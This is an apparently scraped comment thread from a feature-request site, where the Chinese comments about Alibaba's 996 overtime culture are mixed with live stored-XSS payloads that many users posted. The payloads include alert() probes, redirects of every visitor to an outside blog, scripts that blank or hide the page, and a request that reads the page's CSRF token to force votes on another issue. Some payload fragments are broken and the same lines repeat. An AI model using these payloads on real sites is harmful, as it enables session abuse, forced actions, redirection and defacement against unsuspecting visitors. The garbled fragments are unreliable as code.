If it were too difficult to allow as the folder under root, location.href="https://blogs.kainy.cn/?from=feathubXSS2" how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。
If it were too difficult to allow as the folder under root,
window.location.href='https://blogs.kainy.cn/?from=feathubXSS2';
setTimeout("javascript:location.href='hello.html'", 0);
how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。
If it were too difficult to allow as the folder under root,
window.location.href='https://blogs.kainy.cn/?from=feathubXSS2';
how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。
]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/> If it were too difficult to allow as the folder under root,
window.location.href='https://blogs.kainy.cn/?from=feathubXSS2';
setTimeout("javascript:location.href='hello.html'", 0);
how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 。
If it were too difficult to allow as the folder under root,
window.location.href='https://blogs.kainy.cn/?from=feathubXSS2';
setTimeout("javascript:location.href='hello.html'", 0);
how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 。
]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>
yaozhewei commented 10 months ago
img,svg,table{visibility: collapse;}window.onload=function(){var commentBodySet = document.getElementsByClassName("body");for(var i=1;i
jarrettyu commented 10 months ago
怎么没有评论
| lovywinsy commented 10 months ago
什么都不说,才是最好的 ^
JimmyVV commented 10 months ago
:)
| formalin14 commented 10 months ago
默默转发
| xxxwei commented 10 months ago
阿里太忙了,点个赞就走,没时间评论。
Jeffery-Song commented 10 months ago
不同部门不一样吧,之前实习所在部门一般995,周五晚上随意,平时晚上去锻炼什么的也都没问题
FEI17N commented 10 months ago
阿里2c部门是996
| netsman1030 commented 10 months ago
这个应该是个外包提上去的,阿里对外包是真的狠
| Tarry2012 commented 10 months ago
阿里既压榨还洗脑。
| ostopuro commented 10 months ago
| ostopuro commented 10 months ago
反996工作机会介绍群
xx19941215 commented 10 months ago
alert("老哥有xss漏洞哦 修复下")
z231485 commented 10 months ago
alert("我也来注入下试试")
imgss commented 10 months ago
alert("我也来注入下试试")
| wubocong commented 10 months ago
alert('hhh')
jvjs commented 10 months ago
alert("你们把我带坏了")
why66ccff commented 10 months ago
alert("你们别太过分了")
sunrui849 commented 10 months ago
alert("哈哈哈哈哈哈哈哈哈")
d9823 commented 10 months ago
alert("是这样玩的么?")
Lleksi commented 10 months ago
">alert("test")
Lleksi commented 10 months ago
alert("test")
d9823 commented 10 months ago
alert("试试")
d9823 commented 10 months ago
alert("我一个Android开发者都学会了xss注入~~~~~ 这成本也太低了吧")
JohnHuahuaZhan commented 10 months ago
一群傻逼在那里注入,提示有漏洞就行了,注入你妈呢
intrhuting commented 10 months ago
美国上市互联网企业,总部上海,硅谷、北京、深圳、广州、台北都有办公点,全球业务,飞速发展中,开发、运营、产品、销售、商务、设计职位都在招人,薪资丰厚,10点上班,6点多下班,一周5天,拒绝996,不进icu。想内推加v:sharehealthy
abc1310054026 commented 10 months ago
@xx19941215: alert("老哥有xss漏洞哦 修复下") @z231485 : alert("我也来注入下试试") @imgss : alert("我也来注入下试试") @wubocong: alert('hhh') @jvjs : alert("你们把我带坏了") @why66ccff: alert("你们别太过分了") @sunrui849: alert("哈哈哈哈哈哈哈哈哈") @Lleksi : alert("test") alert("test") @d9823 : alert("试试") alert("我一个Android开发者都学会了xss注入~~~~~ 这成本也太低了吧")
666sbX commented 10 months ago
Hacked By Helen收徒QQ925999918
ByMYX commented 10 months ago
alert("长的像个pig昂,还把自己的照片附上去 有病呀!")
ByMYX commented 10 months ago
@xx19941215:alert("长的像个pig昂,还把自己的照片附上去 有病呀!")
ByMYX commented 10 months ago
window.alert = function() { return false; }
ByMYX commented 10 months ago
<!-- window.alert = function(str){ return ; } alert("不能弹出警示框");//-->
sadtrain commented 10 months ago
就这素质还收徒,一个好好的项目被一小部分人玩坏了
sadtrain commented 10 months ago
var picTableBody = document.querySelector('body > div.container > div > div.col-md-9.col-sm-12 > div.comments > div:nth-child(28) > div.media-body > div > div') picTableBody.removeChild(picTableBody.firstChild)
JamesChenX commented 10 months ago
document.body.innerText = '';
LinXueyuanStdio commented 10 months ago Admin
table{visibility: collapse;}
reinit commented 10 months ago
Please report XSS vulnerability
var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1"); xmlReq.send();
reinit commented 10 months ago
Please report XSS vulnerability https://feathub.com/feathub/feathub/+65
var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("method=patch&authenticitytoken=" + document.head.querySelector("[name~=csrf-token][content]").content);
xss67612 commented 10 months ago
document.body.innerText = '';
superzmy commented 10 months ago
for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; }
<script> for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } <script>
| doujinlong1 commented 10 months ago
"/>alert("学习xss注入")<!-
jarrettyu commented 10 months ago
注入是真的烦
| cmlanche commented 10 months ago
禁用js就好了啊
| cmlanche commented 10 months ago
阿里是加班最严重的公司
tancky commented 10 months ago
alert('友情提醒:看到此消息请禁用浏览器javascript功能');
| sueking commented 10 months ago
"/>alert('alibaba')<!--
Presley-Z commented 10 months ago
alert("双锅牛逼")
Presley-Z commented 10 months ago
confirm("双锅牛逼")
| zzxcvbnm19 commented 10 months ago
]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>
| zzxcvbnm19 commented 10 months ago
sadsa
| microhz commented 10 months ago
alert("博主赶紧把布丁打上,大家别起哄了!都是吃口技术饭!积极建立黑名单机制!")
guotao commented 10 months ago
If it were too difficult to allow as the folder under root, location.href="https://blogs.kainy.cn/?from=feathubXSS2" how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。
guotao commented 10 months ago
If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。
kainy commented 10 months ago
If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。
guotao commented 10 months ago
]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/> If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 。
guotao commented 10 months ago
If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 。 ]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>